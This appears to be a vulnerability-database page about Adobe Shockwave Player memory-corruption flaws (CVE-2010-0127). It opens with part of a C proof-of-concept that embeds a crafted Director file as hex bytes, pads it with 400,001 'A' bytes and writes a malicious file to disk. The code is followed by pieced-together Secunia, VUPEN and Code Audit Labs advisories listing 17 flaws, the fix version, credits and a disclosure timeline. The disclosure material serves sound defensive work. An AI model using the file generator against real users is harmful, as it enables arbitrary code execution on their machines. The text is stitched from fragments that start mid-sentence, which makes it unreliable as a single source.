0x63, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,
0x73, 0x04, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00,
0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x50, 0x01, 0x00,
0x00, 0x01, 0x01, 0x00, 0x01, 0x0D, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x77, 0x00, 0x00,
0x00, 0x43, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00,
0x00, 0x65, 0x00, 0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00,
0x00, 0x65, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x75, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53,
0x54, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x61, 0x70,
0x70, 0x00, 0x00, 0x00, 0x0C, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x63, 0x6C, 0x61, 0x73, 0x73, 0x69,
0x63, 0x00, 0x00, 0x00, 0x08, 0x53, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x01, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x38, 0x30, 0x30, 0x30, 0x00, 0x00,
0x00, 0x00, 0x01, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49,
0x52, 0x47, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x40, 0x00, 0x40, 0x00, 0x02,
0x00, 0x23, 0x00, 0x00, 0x00, 0xE6, 0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x3A, 0x7E, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08,
0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08,
0x00, 0x00, 0x00, 0x00, 0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04,
0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00,
0x00, 0x1A, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x01, 0x00, 0x01, 0x00, 0x03,
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x9F, 0x00, 0x00, 0x00, 0x00,
0x00, 0xBB, 0x05, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x04, 0x74, 0x53, 0x41, 0x43, 0x93, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00,
0x00, 0x0C, 0x4A, 0xB4, 0x0B, 0xEF, 0x4A, 0xB4, 0x0B, 0xEF, 0x4E, 0x2F, 0x41, 0x00, 0x00, 0x03,
0x00, 0x00, 0x00, 0x00, 0x00, 0x87, 0x00, 0xA4, 0x00, 0x01, 0xFF, 0x00, 0x01, 0x02, 0x05, 0x00,
0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x60, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x05,
0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0xFF, 0xFF, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x14, 0x00, 0x69,
0x06, 0x66, 0x6F, 0x72, 0x67, 0x65, 0x74, 0x06, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x06, 0x72,
0x65, 0x74, 0x75, 0x72, 0x6E, 0x0D, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x50, 0x72, 0x65, 0x73,
0x65, 0x6E, 0x74, 0x03, 0x6E, 0x65, 0x77, 0x08, 0x66, 0x69, 0x6C, 0x65, 0x4E, 0x61, 0x6D, 0x65,
0x05, 0x74, 0x69, 0x74, 0x6C, 0x65, 0x07, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x09, 0x73,
0x70, 0x72, 0x69, 0x74, 0x65, 0x54, 0x61, 0x62, 0x07, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74,
0x06, 0x73, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x06, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x07, 0x70,
0x69, 0x63, 0x74, 0x75, 0x72, 0x65, 0x09, 0x68, 0x65, 0x6C, 0x70, 0x54, 0x6F, 0x70, 0x69, 0x63,
0x17, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x44, 0x65, 0x73, 0x63, 0x72, 0x69, 0x70,
0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x61, 0x6D, 0x65, 0x06, 0x66, 0x6F,
0x72, 0x6D, 0x61, 0x74, 0x06, 0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x0A, 0x73, 0x74, 0x61, 0x72,
0x74, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x07, 0x69, 0x6E, 0x74, 0x65, 0x67, 0x65, 0x72, 0x08, 0x65,
0x6E, 0x64, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x09, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x4E, 0x75,
0x6D, 0x08, 0x65, 0x64, 0x69, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x07, 0x62, 0x6F, 0x6F, 0x6C, 0x65,
0x61, 0x6E, 0x06, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x05, 0x72, 0x61, 0x6E, 0x67, 0x65, 0x09,
0x66, 0x6F, 0x72, 0x65, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x09,
0x62, 0x61, 0x63, 0x6B, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x62, 0x6C, 0x65, 0x6E, 0x64, 0x03,
0x6D, 0x69, 0x6E, 0x03, 0x6D, 0x61, 0x78, 0x03, 0x69, 0x6E, 0x6B, 0x04, 0x6C, 0x6F, 0x63, 0x48,
0x04, 0x6C, 0x6F, 0x63, 0x56, 0x05, 0x77, 0x69, 0x64, 0x74, 0x68, 0x06, 0x68, 0x65, 0x69, 0x67,
0x68, 0x74, 0x08, 0x72, 0x6F, 0x74, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x05, 0x66, 0x6C, 0x6F, 0x61,
0x74, 0x04, 0x73, 0x6B, 0x65, 0x77, 0x05, 0x66, 0x6C, 0x69, 0x70, 0x48, 0x05, 0x66, 0x6C, 0x69,
0x70, 0x56, 0x06, 0x66, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x13, 0x69, 0x74, 0x65, 0x6D, 0x44, 0x65,
0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x6F,
0x74, 0x65, 0x04, 0x74, 0x79, 0x70, 0x65, 0x05, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x04, 0x74, 0x65,
0x78, 0x74, 0x04, 0x6C, 0x65, 0x66, 0x74, 0x03, 0x74, 0x6F, 0x70, 0x05, 0x72, 0x69, 0x67, 0x68,
0x74, 0x06, 0x62, 0x6F, 0x74, 0x74, 0x6F, 0x6D, 0x09, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x54,
0x61, 0x62, 0x06, 0x6E, 0x75, 0x6D, 0x62, 0x65, 0x72, 0x0A, 0x63, 0x61, 0x73, 0x74, 0x4C, 0x69,
0x62, 0x4E, 0x75, 0x6D, 0x0A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x54, 0x65, 0x78, 0x74, 0x07,
0x67, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x70, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x69, 0x6F, 0x6E,
0x44, 0x61, 0x74, 0x65, 0x04, 0x64, 0x61, 0x74, 0x65, 0x0C, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69,
0x65, 0x64, 0x44, 0x61, 0x74, 0x65, 0x0A, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42,
0x79, 0x08, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x0D, 0x70, 0x75, 0x72, 0x67, 0x65,
0x50, 0x72, 0x69, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x08, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65,
0x64, 0x06, 0x6C, 0x69, 0x6E, 0x6B, 0x65, 0x64, 0x06, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x64, 0x05,
0x6D, 0x65, 0x64, 0x69, 0x61, 0x09, 0x74, 0x68, 0x75, 0x6D, 0x62, 0x6E, 0x61, 0x69, 0x6C, 0x04,
0x73, 0x69, 0x7A, 0x65, 0x0A, 0x6D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x73, 0x69, 0x7A, 0x65, 0x0A,
0x6D, 0x65, 0x64, 0x69, 0x61, 0x52, 0x65, 0x61, 0x64, 0x79, 0x0C, 0x67, 0x72, 0x61, 0x70, 0x68,
0x69, 0x63, 0x50, 0x72, 0x6F, 0x70, 0x73, 0x06, 0x68, 0x69, 0x6C, 0x69, 0x74, 0x65, 0x08, 0x72,
0x65, 0x67, 0x50, 0x6F, 0x69, 0x6E, 0x74, 0x05, 0x70, 0x6F, 0x69, 0x6E, 0x74, 0x04, 0x72, 0x65,
0x63, 0x74, 0x05, 0x61, 0x62, 0x6F, 0x75, 0x74, 0x06, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x0A,
0x65, 0x64, 0x69, 0x74, 0x53, 0x63, 0x72, 0x69, 0x70, 0x74, 0x04, 0x65, 0x64, 0x69, 0x74, 0x09,
0x6E, 0x61, 0x6D, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x09, 0x61, 0x6C, 0x69, 0x67, 0x6E, 0x6D,
0x65, 0x6E, 0x74, 0x08, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x09, 0x73, 0x69, 0x7A,
0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x06, 0x62, 0x72, 0x6F, 0x77, 0x73, 0x65, 0x07, 0x6F, 0x70,
0x74, 0x69, 0x6F, 0x6E, 0x73, 0x0A, 0x70, 0x75, 0x72, 0x67, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C,
0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x07, 0x63, 0x72,
0x65, 0x61, 0x74, 0x65, 0x64, 0x0D, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x4C, 0x61,
0x62, 0x65, 0x6C, 0x0F, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42, 0x79, 0x4C, 0x61,
0x62, 0x65, 0x6C, 0x0D, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x4C, 0x61, 0x62, 0x65,
0x6C, 0x05, 0x66, 0x69, 0x65, 0x6C, 0x64, 0x06, 0x73, 0x63, 0x72, 0x6F, 0x6C, 0x6C, 0x08, 0x73,
0x68, 0x61, 0x70, 0x65, 0x54, 0x61, 0x62, 0x05, 0x73, 0x68, 0x61, 0x70, 0x65, 0x06, 0x66, 0x69,
0x6C, 0x6C, 0x65, 0x64, 0x09, 0x73, 0x68, 0x61, 0x70, 0x65, 0x54, 0x79, 0x70, 0x65, 0x04, 0x6F,
0x76, 0x61, 0x6C, 0x09, 0x72, 0x6F, 0x75, 0x6E, 0x64, 0x52, 0x65, 0x63, 0x74, 0x04, 0x6C, 0x69,
0x6E, 0x65, 0x08, 0x6C, 0x69, 0x6E, 0x65, 0x53, 0x69, 0x7A, 0x65, 0x0B, 0x67, 0x72, 0x61, 0x6E,
0x75, 0x6C, 0x61, 0x72, 0x69, 0x74, 0x79, 0x0D, 0x6C, 0x69, 0x6E, 0x65, 0x44, 0x69, 0x72, 0x65,
0x63, 0x74, 0x69, 0x6F, 0x6E, 0x07, 0x70, 0x61, 0x74, 0x74, 0x65, 0x72, 0x6E, 0x00, 0x20, 0x6C,
0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x46, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46,
0x57, 0x56, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x61,
0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x63,
0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x66, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E,
0x2F, 0x41, 0x00, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E, 0x2F, 0x41, 0x00, 0x4A, 0x43,
0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20,
0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x6C, 0x71, 0x77, 0x72, 0x6D, 0x5C, 0x44,
0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x41, 0x44, 0x4F, 0x42, 0x45, 0x20, 0x44, 0x49, 0x52,
0x45, 0x43, 0x54, 0x4F, 0x52, 0x20, 0x57, 0x4F, 0x52, 0x4B, 0x49, 0x4E, 0x47, 0x20, 0x56, 0x55,
0x4C, 0x4E, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x5A, 0x5C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x53,
0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0xFF, 0xFF, 0xFF, 0xFD, 0x00, 0x00,
0x00, 0x0C, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x8C, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00,
0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,
0x00, 0x8A, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x0E, 0x00, 0x30, 0x03, 0xEE,
0x00, 0x96, 0x00, 0x36, 0x00, 0x30, 0x01, 0x20, 0x10, 0x80, 0x00, 0xFF, 0x00, 0x01, 0x00, 0x01,
0x00, 0x00, 0x00, 0x03, 0x00, 0x97, 0x00, 0x2E, 0x00, 0x87, 0x00, 0xA4, 0x30, 0x00, 0x02, 0x00,
0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x01, 0x36, 0x82, 0x00,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,
0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0F, 0xE1, 0xFD, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x54,
0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4C, 0x54, 0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43,
0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x24, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00,
0xDD, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xF8, 0x00, 0xEF, 0xFF, 0xF8, 0x00, 0xFA, 0x00,
0xEB, 0xFF, 0xFA, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFC, 0x00, 0xE7, 0xFF, 0xFC, 0x00,
0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0x01, 0x00, 0x00, 0xE1,
0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF,
0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00,
0xDF, 0xFF, 0x00, 0x00, 0xDE, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00,
0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00,
0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00,
0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFC, 0x00, 0xE7, 0xFF,
0xFC, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFA, 0x00, 0xEB, 0xFF, 0xFA, 0x00, 0xF8, 0x00,
0xEF, 0xFF, 0xF8, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00,
0xDD, 0x00, 0xDD, 0x00 //8756
};
int main(int argc, char *argv[])
{
char buff[409008];
char junk[400001];
memset(junk,0x41,400001);
memcpy(buff,shocks,strlen(shocks));
memcpy(buff+strlen(shocks),junk,strlen(junk));
memcpy(buff+strlen(shocks)+strlen(junk),shocke,strlen(shocke));
fp = fopen(FFORMAT,"wb");
if(fp==NULL)
{
perror ("\nUweeepa! Can't open file.\n");
}
fwrite(buff,1,sizeof(buff),fp);
fclose(fp);
printf("\nFile %s successfully created!\n\a", FFORMAT);
return 0;
}
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. User interaction is required
in that a user must visit a malicious web site. When a malicious value is used
during a memory dereference a possible 4-byte memory overwrite may
occur. Exploitation can lead to remote system compromise under the
credentials of the currently logged in user.
About Code Audit Labs:
=====================
Code Audit Labs is department of VulnHunt company which provide a
professional security testing products / services / security consulting
and training ,we sincerely hope we can help your procudes to improve code
quality and safety.
WebSite http://www.VulnHunt.com ( online soon)
.
These vulnerabilities are caused due to memory corruptions, array indexing,
heap overflows and invalid pointers when processing malformed files, which
could be exploited by attackers to execute arbitrary code by tricking a user
into visiting a specially crafted web page.
III. Binary Analysis & Proof-of-concept
---------------------------------------
In-depth binary analysis, code execution exploits and proof-of-concept
codes are published through the VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
V. CREDIT
--------------
Discovered by Chaouki Bekrar and Sebastien Renaud of VUPEN Security
VII. ABOUT VUPEN Security
---------------------------
VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.
Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.
* VUPEN Vulnerability Notification Service:
http://www.vupen.com/english/services/
* VUPEN Binary Analysis & Exploits Service :
http://www.vupen.com/exploits/
* VUPEN Web Application Security Scanner (WASS):
http://www.vupen.com/english/wass/
VIII. REFERENCES
----------------------
http://www.vupen.com/english/advisories/2010/1128
http://www.adobe.com/support/security/bulletins/apsb10-12.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1280
IX. DISCLOSURE TIMELINE
-----------------------------
2010-02-24 - Vendor notified
2010-02-24 - Vendor response
2010-03-02 - Status update received
2010-05-07 - Status update received
2010-05-12 - Coordinated public Disclosure
| VAR-201005-0050 | CVE-2010-0127 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
